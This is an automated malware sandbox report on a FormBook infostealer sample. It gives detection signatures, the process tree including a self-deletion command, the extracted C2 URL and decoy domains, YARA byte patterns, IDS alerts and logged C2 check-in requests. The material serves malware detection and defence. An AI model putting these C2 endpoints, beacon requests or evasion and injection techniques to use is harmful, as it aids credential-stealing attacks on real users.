
Analysis Report 350969bc_by_Libranalysis

Overview

General Information

Sample Name: 350969bc_by_Libranalysis (renamed file extension from none to exe)
Analysis ID: 412308
MD5: 350969bc82ec33af12acf100c41eb4d1
SHA1: f17d5fc8bad55cc2b523173b43585e9edb9154e4
SHA256: 961ac1d96eb469d4a949c18c25de7bf7d3ad79a502794b470a3505fa8b65d023
Tags: Formbook

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected AntiVM3
Yara detected FormBook
C2 URLs / IPs found in malware configuration
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Antivirus or Machine Learning detection for unpacked file
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w10x64
  • 350969bc_by_Libranalysis.exe (PID: 6988 cmdline: 'C:\Users\user\Desktop\350969bc_by_Libranalysis.exe' MD5: 350969BC82EC33AF12ACF100C41EB4D1)
    • 350969bc_by_Libranalysis.exe (PID: 3416 cmdline: C:\Users\user\Desktop\350969bc_by_Libranalysis.exe MD5: 350969BC82EC33AF12ACF100C41EB4D1)
      • explorer.exe (PID: 3424 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • control.exe (PID: 6576 cmdline: C:\Windows\SysWOW64\control.exe MD5: 40FBA3FBFD5E33E0DE1BA45472FDA66F)
          • cmd.exe (PID: 6260 cmdline: /c del 'C:\Users\user\Desktop\350969bc_by_Libranalysis.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 7160 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.sabaidiving.com/i6rd/"], "decoy": ["blissfulbeeboutique.online", "syazanisuhaimi.com", "designaliveeuk.com", "andradeasfora.com", "barnesandn.com", "onlinecasinocrazy.com", "cornerstonemedwa.com", "fijiherald.com", "experienciaswagon.com", "cityofhouston.info", "thebenefitssherpa.com", "honeyew.com", "sliceinvestors.com", "socialeconomic.net", "ballisticjet.com", "fortuneland.fund", "globaleranking.com", "gracestationchurch.com", "mixigo.net", "ximibabes.com", "morooka.club", "kittycarehotel.com", "solartenacres.com", "bunies3.com", "celery.store", "grayboxus.com", "haopianba.com", "021rencai.net", "cortinasenrollablesloscabos.com", "qiaosouwenku.com", "856379607.xyz", "urgentdocservices.com", "countrywideeconomy.com", "onemoresysadmin.com", "salemerket.com", "susiebennett.com", "comedyforyou.com", "satssar.com", "woo.education", "shellgang.com", "wattaccounting.com", "mandapeoplesyatem.com", "cavaliertrimmershop.com", "netfx-service.com", "s138s9.com", "smoothome.com", "cabinhealthy.com", "sexyvenushuegel.net", "jsvending.info", "gej2holdings.com", "arcticluxuryvillas.com", "shinsotoknives.com", "mardigrasdecorators.com", "ainongshucai.com", "ricdevan.com", "boringcode.net", "thebotanicaltype.com", "jewelonsale.com", "sunstatepipelines.com", "jasontaylor.online", "clipsquote.com", "toypoodlebreedershome.com", "thearcadelounge.com", "unico-m.online"]}

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings

Source: 0000000A.00000002.916735490.0000000000540000.00000004.00000001.sdmp | Rule: JoeSecurity_FormBook | Description: Yara detected FormBook | Author: Joe Security

Source: 0000000A.00000002.916735490.0000000000540000.00000004.00000001.sdmp | Rule: Formbook_1 | Description: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
  • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x8982:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x14695:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x14181:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x14797:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x1490f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x939a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x133fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xa112:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x19787:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1a82a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00

Source: 0000000A.00000002.916735490.0000000000540000.00000004.00000001.sdmp | Rule: Formbook | Description: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
  • 0x166b9:$sqlite3step: 68 34 1C 7B E1
  • 0x167cc:$sqlite3step: 68 34 1C 7B E1
  • 0x166e8:$sqlite3text: 68 38 2A 90 C5
  • 0x1680d:$sqlite3text: 68 38 2A 90 C5
  • 0x166fb:$sqlite3blob: 68 53 D8 7F 8C
  • 0x16823:$sqlite3blob: 68 53 D8 7F 8C

Source: 00000005.00000002.715972789.0000000001090000.00000040.00000001.sdmp | Rule: JoeSecurity_FormBook | Description: Yara detected FormBook | Author: Joe Security

Source: 00000005.00000002.715972789.0000000001090000.00000040.00000001.sdmp | Rule: Formbook_1 | Description: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
  • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x8982:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x14695:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x14181:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x14797:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x1490f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x939a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x133fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xa112:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x19787:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1a82a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00

Unpacked PEs

Source | Rule | Description | Author | Strings

Source: 5.2.350969bc_by_Libranalysis.exe.400000.0.raw.unpack | Rule: JoeSecurity_FormBook | Description: Yara detected FormBook | Author: Joe Security

Source: 5.2.350969bc_by_Libranalysis.exe.400000.0.raw.unpack | Rule: Formbook_1 | Description: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
  • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x8982:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x14695:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x14181:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x14797:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x1490f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x939a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x133fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xa112:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x19787:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1a82a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00

Source: 5.2.350969bc_by_Libranalysis.exe.400000.0.raw.unpack | Rule: Formbook | Description: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
  • 0x166b9:$sqlite3step: 68 34 1C 7B E1
  • 0x167cc:$sqlite3step: 68 34 1C 7B E1
  • 0x166e8:$sqlite3text: 68 38 2A 90 C5
  • 0x1680d:$sqlite3text: 68 38 2A 90 C5
  • 0x166fb:$sqlite3blob: 68 53 D8 7F 8C
  • 0x16823:$sqlite3blob: 68 53 D8 7F 8C

Source: 5.2.350969bc_by_Libranalysis.exe.400000.0.unpack | Rule: JoeSecurity_FormBook | Description: Yara detected FormBook | Author: Joe Security

Source: 5.2.350969bc_by_Libranalysis.exe.400000.0.unpack | Rule: Formbook_1 | Description: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
  • 0x77e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x7b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x13895:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x13381:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x13997:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x13b0f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x859a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x125fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0x9312:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x18987:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x19a2a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00

Sigma Overview

No Sigma rule has matched

Signature Overview

AV Detection:

Found malware configuration
Source: 00000005.00000002.715972789.0000000001090000.00000040.00000001.sdmp; Malware Configuration Extractor: FormBook (C2 list and decoy domains as listed under Malware Configuration above)
Multi AV Scanner detection for submitted file
Source: 350969bc_by_Libranalysis.exe; ReversingLabs: Detection: 36%
Yara detected FormBook
Source: Yara match; File source: 0000000A.00000002.916735490.0000000000540000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000005.00000002.715972789.0000000001090000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000005.00000002.715159107.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000005.00000002.715784952.0000000000F30000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 0000000A.00000002.917116074.00000000027A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000000.00000002.664412012.0000000004449000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 5.2.350969bc_by_Libranalysis.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 5.2.350969bc_by_Libranalysis.exe.400000.0.unpack, type: UNPACKEDPE
Machine Learning detection for sample
Source: 350969bc_by_Libranalysis.exe; Joe Sandbox ML: detected
Source: 5.2.350969bc_by_Libranalysis.exe.400000.0.unpack; Avira: Label: TR/Crypt.ZPACK.Gen
Source: 350969bc_by_Libranalysis.exe; Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Source: 350969bc_by_Libranalysis.exe; Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: Binary string: wscui.pdbUGP; source: explorer.exe, 00000006.00000002.927845340.0000000005A00000.00000002.00000001.sdmp
Source: Binary string: wntdll.pdbUGP; source: 350969bc_by_Libranalysis.exe, 00000005.00000002.716595208.000000000150F000.00000040.00000001.sdmp, control.exe, 0000000A.00000002.917676235.0000000004710000.00000040.00000001.sdmp
Source: Binary string: control.pdb; source: 350969bc_by_Libranalysis.exe, 00000005.00000002.716167439.000000000114A000.00000004.00000020.sdmp
Source: Binary string: wntdll.pdb; source: 350969bc_by_Libranalysis.exe, control.exe
Source: Binary string: control.pdbUGP; source: 350969bc_by_Libranalysis.exe, 00000005.00000002.716167439.000000000114A000.00000004.00000020.sdmp
Source: Binary string: wscui.pdb; source: explorer.exe, 00000006.00000002.927845340.0000000005A00000.00000002.00000001.sdmp

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic; Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49752 -> 34.102.136.180:80
Source: Traffic; Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49752 -> 34.102.136.180:80
Source: Traffic; Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49752 -> 34.102.136.180:80
Source: Traffic; Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49764 -> 103.15.186.68:80
Source: Traffic; Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49764 -> 103.15.186.68:80
Source: Traffic; Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49764 -> 103.15.186.68:80
Source: Traffic; Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49770 -> 23.227.38.74:80
Source: Traffic; Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49770 -> 23.227.38.74:80
Source: Traffic; Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49770 -> 23.227.38.74:80
Source: Traffic; Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49771 -> 192.64.147.164:80
Source: Traffic; Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49771 -> 192.64.147.164:80
Source: Traffic; Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49771 -> 192.64.147.164:80
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor; URLs: www.sabaidiving.com/i6rd/
Source: global traffic; HTTP traffic detected: GET /i6rd/?gHSLCj58=LPK2IT8klZq3HV5LkVv0HrUERmrfkAigbODxoDO8ybIsb03GvAFTkZSuj3fGszWvHktP&9rJ=N8YdlZih HTTP/1.1 | Host: www.thebenefitssherpa.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic; HTTP traffic detected: GET /i6rd/?gHSLCj58=erkeaSWQY+Clkg2r/Pi/REnUuZTidSmaWK+TmjN6ZRgeJAvAzvFr0iNL5kMJBQzOKWdi&9rJ=N8YdlZih HTTP/1.1 | Host: www.onlinecasinocrazy.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic; HTTP traffic detected: GET /i6rd/?gHSLCj58=smN73hIgGm+8k6TIdjzBFwruzJIggaSM7b/fO07bhI8vXH2xBAb/Cwk8Hoq4ZaNv9SU/&9rJ=N8YdlZih HTTP/1.1 | Host: www.blissfulbeeboutique.online | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic; HTTP traffic detected: GET /i6rd/?gHSLCj58=OPhbRlTkoXrsQ0r3dKw1IvWRRcBcb3Q4dmj86tcXQUJSZPkW56a8j7HjPVLeeIGxTFMj&9rJ=N8YdlZih HTTP/1.1 | Host: www.cityofhouston.info | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic; HTTP traffic detected: GET /i6rd/?gHSLCj58=ghT/ntM+diyN3YW/4q0tO05CJd4dCe68Gx0VtJcOz7kJ2fBcIsU6AMgtishNfwDLzL+S&9rJ=N8YdlZih HTTP/1.1 | Host: www.socialeconomic.net | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic; HTTP traffic detected: GET /i6rd/?gHSLCj58=87tzyM19Su4M9sklYGX+FxwUh158b1qmSh9f/APlSoINpVQ2gCQ5Erv1vAVp92mNDUWx&9rJ=N8YdlZih HTTP/1.1 | Host: www.toypoodlebreedershome.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic; HTTP traffic detected: GET /i6rd/?gHSLCj58=lFTIMkQ5ik6igxl0SADoA/l4wqgGqwWePHw2ryfpEDmwfQ+0wMbe0XdxLJthRM6xta9b&9rJ=N8YdlZih HTTP/1.1 | Host: www.ricdevan.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic; HTTP traffic detected: GET /i6rd/?gHSLCj58=/0C7Nd/5ZhwBGDRTMer0ywO01wFnuraj4upl6M1zLF0nwnsKqCnReLNuI6TuwxtThkOZ&9rJ=N8YdlZih HTTP/1.1 | Host: www.ximibabes.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic; HTTP traffic detected: GET /i6rd/?gHSLCj58=kbJM45GZrQKbh6aR4KV/wVFZMmwDJvkUUs1obqo0rCdmSsWUtmFh0yx89FvYawyrRJzX&9rJ=N8YdlZih HTTP/1.1 | Host: www.sabaidiving.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic; HTTP traffic detected: GET /i6rd/?gHSLCj58=wbIaUdvQqzQbHKzWrifpae4yz+HPBnPf3VQSw8NlhdhOO9H/uFvMKdwnlncPTgk9QTjs&9rJ=N8YdlZih HTTP/1.1 | Host: www.onemoresysadmin.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic; HTTP traffic detected: GET /i6rd/?gHSLCj58=HOLe4E5VAs/9VGl0AghSjQ5UDYBgOj/qhjKLxJJROTaYJ7IE9VG9ZYc05xBD+gnk3HpC&9rJ=N8YdlZih HTTP/1.1 | Host: www.countrywideeconomy.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: Joe Sandbox View; IP Address: 52.58.78.16
Source: Joe Sandbox View; ASN Name: AMAZON-02US
Source: Joe Sandbox View; ASN Name: VOODOO1US
Source: Joe Sandbox View; ASN Name: CLOUDFLARENETUS
Source: unknown; DNS traffic detected: queries for: www.thebenefitssherpa.com
Source: global traffic; HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.14.0 | Date: Wed, 12 May 2021 13:48:08 GMT | Content-Type: text/html; charset=iso-8859-1 | Content-Length: 387 | Connection: close | Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache Server at www.cityofhouston.info Port 80</address></body></html>
Source: 350969bc_by_Libranalysis.exe; String found in binary or memory: Http://google.com.br
Source: explorer.exe, 00000006.00000000.687689175.000000000B976000.00000002.00000001.sdmp; String found in binary or memory: http://fontfabrik.com
Source: 350969bc_by_Libranalysis.exe, 00000000.00000002.662905887.0000000003441000.00000004.00000001.sdmp; String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: explorer.exe, 00000006.00000000.666349326.0000000002B50000.00000002.00000001.sdmp; String found in binary or memory: http://www.%s.comPA
Source: explorer.exe, 00000006.00000000.687689175.000000000B976000.00000002.00000001.sdmp; String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: explorer.exe, 00000006.00000000.687689175.000000000B976000.00000002.00000001.sdmp; String found in binary or memory: http://www.carterandcone.coml
Source: control.exe, 0000000A.00000002.918833437.0000000004DC2000.00000004.00000001.sdmp; String found in binary or memory: http://www.countrywideeconomy.com
Source: control.exe, 0000000A.00000002.918833437.0000000004DC2000.00000004.00000001.sdmp; String found in binary or memory: http://www.countrywideeconomy.com/
Source: explorer.exe, 00000006.00000000.687689175.000000000B976000.00000002.00000001.sdmp; String found in binary or memory: http://www.fontbureau.com
Source: explorer.exe, 00000006.00000000.687689175.000000000B976000.00000002.00000001.sdmp; String found in binary or memory: http://www.fontbureau.com/designers
Source: explorer.exe, 00000006.00000000.687689175.000000000B976000.00000002.00000001.sdmp; String found in binary or memory: http://www.fontbureau.com/designers/?
Source: explorer.exe, 00000006.00000000.687689175.000000000B976000.00000002.00000001.sdmp; String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: explorer.exe, 00000006.00000000.687689175.000000000B976000.00000002.00000001.sdmp; String found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
Source: explorer.exe, 00000006.00000000.687689175.000000000B976000.00000002.00000001.sdmp; String found in binary or memory: http://www.fontbureau.com/designers8
Source: explorer.exe, 00000006.00000000.687689175.000000000B976000.00000002.00000001.sdmp; String found in binary or memory: http://www.fontbureau.com/designers?
Source: explorer.exe, 00000006.00000000.687689175.000000000B976000.00000002.00000001.sdmp; String found in binary or memory: http://www.fontbureau.com/designersG
Source: explorer.exe, 00000006.00000000.687689175.000000000B976000.00000002.00000001.sdmp; String found in binary or memory: http://www.fonts.com
Source: explorer.exe, 00000006.00000000.687689175.000000000B976000.00000002.00000001.sdmp; String found in binary or memory: http://www.founder.com.cn/cn
Source: explorer.exe, 00000006.00000000.687689175.000000000B976000.00000002.00000001.sdmp; String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: explorer.exe, 00000006.00000000.687689175.000000000B976000.00000002.00000001.sdmp; String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: explorer.exe, 00000006.00000000.687689175.000000000B976000.00000002.00000001.sdmp; String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: explorer.exe, 00000006.00000000.687689175.000000000B976000.00000002.00000001.sdmp; String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: explorer.exe, 00000006.00000000.687689175.000000000B976000.00000002.00000001.sdmp; String found in binary or memory: http://www.goodfont.co.kr
Source: explorer.exe, 00000006.00000000.687689175.000000000B976000.00000002.00000001.sdmp; String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: explorer.exe, 00000006.00000000.687689175.000000000B976000.00000002.00000001.sdmp; String found in binary or memory: http://www.sajatypeworks.com
Source: explorer.exe, 00000006.00000000.687689175.000000000B976000.00000002.00000001.sdmp; String found in binary or memory: http://www.sakkal.com
Source: explorer.exe, 00000006.00000000.687689175.000000000B976000.00000002.00000001.sdmp; String found in binary or memory: http://www.sandoll.co.kr
Source: explorer.exe, 00000006.00000000.687689175.000000000B976000.00000002.00000001.sdmp; String found in binary or memory: http://www.tiro.com
Source: explorer.exe, 00000006.00000000.687689175.000000000B976000.00000002.00000001.sdmp; String found in binary or memory: http://www.typography.netD
Source: explorer.exe, 00000006.00000000.687689175.000000000B976000.00000002.00000001.sdmp; String found in binary or memory: http://www.urwpp.deDPlease
Source: explorer.exe, 00000006.00000000.687689175.000000000B976000.00000002.00000001.sdmp; String found in binary or memory: http://www.zhongyicts.com.cn
Source: control.exe, 0000000A.00000002.918833437.0000000004DC2000.00000004.00000001.sdmp; String found in binary or memory: https://ajax.googleapis.com/ajax/libs/jquery/1.8.3/jquery.min.js
Source: 350969bc_by_Libranalysis.exe, 00000000.00000002.662948300.0000000003486000.00000004.00000001.sdmp; String found in binary or memory: https://stackpath.bootstrapcdn.com/bootstrap/4.5.0/css/bootstrap.min.css

E-Banking Fraud:

Yara detected FormBook
Source: Yara match; File source: 0000000A.00000002.916735490.0000000000540000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000005.00000002.715972789.0000000001090000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000005.00000002.715159107.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000005.00000002.715784952.0000000000F30000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 0000000A.00000002.917116074.00000000027A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000000.00000002.664412012.0000000004449000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 5.2.350969bc_by_Libranalysis.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 5.2.350969bc_by_Libranalysis.exe.400000.0.unpack, type: UNPACKEDPE

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
          Source: 0000000A.00000002.916735490.0000000000540000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000A.00000002.916735490.0000000000540000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 00000005.00000002.715972789.0000000001090000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000002.715972789.0000000001090000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 00000005.00000002.715159107.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000002.715159107.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 00000005.00000002.715784952.0000000000F30000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000002.715784952.0000000000F30000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 0000000A.00000002.917116074.00000000027A0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000A.00000002.917116074.00000000027A0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.664412012.0000000004449000.00000004.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000002.664412012.0000000004449000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 5.2.350969bc_by_Libranalysis.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 5.2.350969bc_by_Libranalysis.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 5.2.350969bc_by_Libranalysis.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 5.2.350969bc_by_Libranalysis.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exe | Code function: 5_2_004181C0 NtCreateFile
Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exe | Code function: 5_2_00418270 NtReadFile
Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exe | Code function: 5_2_004182F0 NtClose
Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exe | Code function: 5_2_004183A0 NtAllocateVirtualMemory
Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exe | Code function: 5_2_004181BA NtCreateFile
Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exe | Code function: 5_2_0041839A NtAllocateVirtualMemory
Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exe | Code function: 5_2_01459540 NtReadFile,LdrInitializeThunk
Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exe | Code function: 5_2_01459910 NtAdjustPrivilegesToken,LdrInitializeThunk
Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exe | Code function: 5_2_014595D0 NtClose,LdrInitializeThunk
Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exe | Code function: 5_2_014599A0 NtCreateSection,LdrInitializeThunk
Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exe | Code function: 5_2_01459840 NtDelayExecution,LdrInitializeThunk
Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exe | Code function: 5_2_01459860 NtQuerySystemInformation,LdrInitializeThunk
Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exe | Code function: 5_2_014598F0 NtReadVirtualMemory,LdrInitializeThunk
Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exe | Code function: 5_2_01459710 NtQueryInformationToken,LdrInitializeThunk
Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exe | Code function: 5_2_01459FE0 NtCreateMutant,LdrInitializeThunk
Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exe | Code function: 5_2_01459780 NtMapViewOfSection,LdrInitializeThunk
Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exe | Code function: 5_2_014597A0 NtUnmapViewOfSection,LdrInitializeThunk
Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exe | Code function: 5_2_01459A50 NtCreateFile,LdrInitializeThunk
